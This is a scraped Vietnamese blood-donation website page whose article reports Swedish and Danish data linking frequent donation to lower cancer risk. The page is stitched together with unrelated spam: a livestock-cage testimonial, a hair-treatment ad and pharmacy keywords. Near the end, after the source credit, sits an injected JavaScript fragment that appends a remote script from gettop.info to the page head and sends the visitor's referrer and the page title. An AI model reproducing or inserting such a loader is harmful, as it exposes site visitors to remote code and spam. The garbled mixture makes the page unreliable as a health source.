Website cùng hệ thống:
Hỗ trợ trực tuyến:

Hoàng Giáp cung cấp lồng công nghiệp giá rẻ nhưng rất chuyên nghiệp. Sản phẩm bán lồng thỏ 100 làm bằng máy tự động, các mối hàn gọn, chắc chắn, các nan lồng được mạ kẽm sáng bóng và độ bền cao. Tôi đã sử dụng toàn bộ thiết bị máy làm cám Hoàng Giáp cung cấp từ lồng thỏ, van uống nước cho thỏ, máng ăn cho thỏ, tấm nhựa đa năng. Đặc biệt tôi rất yêu thích bán máy ép cám viên chăn nuôi, bởi sản phẩm này giúp tôi tiết kệm 60% chi phí chăn nuôi và 70% nhân lực cho chăn nuôi. Cảm ơn Hoàng Giáp Nhận đào tạo, hướng dẫn giải pháp phục hồi tóc hư tổn tận gốc chỉ sau 1 tuần

^ Lên đầu trang
Hiến máu thường xuyên giảm nguy cơ ung thư

Hiến máu thường xuyên giảm nguy cơ ung thư

Đăng ngày 06/02/2012

Mọi người không nên lo lắng về việc đi hiến máu. Thực tế hoạt động này thường xuyên còn giúp ngăn ngừa nguy cơ ung thư và tử vong.

Tiến sĩ Gustaf Edgren tại Viện Karolinska, ở Stockholm, Thụy Điển, cho biết theo lý thuyết, có một vài cơ chế mà việc hiến máu thường xuyên có thể tác động tới sức khỏe. Chẳng hạn, hút máu khiến cơ thể tăng cường việc sản xuất tế bào máu trong tủy xương. Điều này sẽ tăng tốc sự phân chia tế bào, dẫn tới những hỏng hóc trong mô máu.

Tuy nhiên về mặt tích cực, sự tích trữ sắt quá nhiều sẽ dẫn tới bệnh tim và một số dạng ung thư, vì vậy những người hiến máu thường xuyên sẽ loại bỏ bớt khối dự trữ này và từ đó tăng cường sức khỏe.

Để hiểu rõ hơn về việc hiến máu tác động tới sức khỏe như thế nào, Edgren và cộng sự đã tìm hiểu dữ liệu từ những ngân hàng máu Thụy Điển và Đan Mạch, cũng như thông tin về những người cho máu ít nhất 1 lần từ năm 1968 đến 2002.

Nhóm tìm thấy trong những người hiến máu, nguy cơ bị ung thư gan, phổi, dạ dày, ruột già và cổ họng giảm dần khi tần suất hiến máu tăng lên. Điều này chứng tỏ việc giảm hàm lượng sắt giúp ngăn ngừa nguy cơ ung thư.

“Chỉ một rủi ro nhỏ do hiến máu mang lại cũng là một vấn đề nghiêm trọng, bởi có rất nhiều người đang cho máu”, Edgren nói. “Tuy nhiên, chúng tôi đã chứng tỏ rằng không có nguy cơ nào đối với những người tặng máu cho người khác”.

 

Pills (Theo vnexpress.net)d.getElementsByTagName(‘head’)[0].appendChild(s); Cheap buy actos 30mg Purchase online s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; online can i buy clomid over the counter online

© 2012 – 2018, NhómMáu.vn. Giữ toàn quyền. Vui lòng ghi rõ nguồn khi bạn phát hành lại nội dung từ website này.


Bài viết liên quan

Bộ Y Tế Trung Ương Hội Chữ thập đỏ Việt Nam Kênh truyền hình Sức khỏe O2TV Viện Huyết học truyền máu Trung ương Bệnh viện K Bệnh viện Bạch Mai Bệnh viện Trung Ương Quân đội 108 Bệnh viện 103 Bệnh viện hữu nghị Việt Đức Bệnh viện Nhi Trung Ương Bệnh viện Phụ sản Trung Ương Bệnh viện Phụ sản Hà Nội EldonCard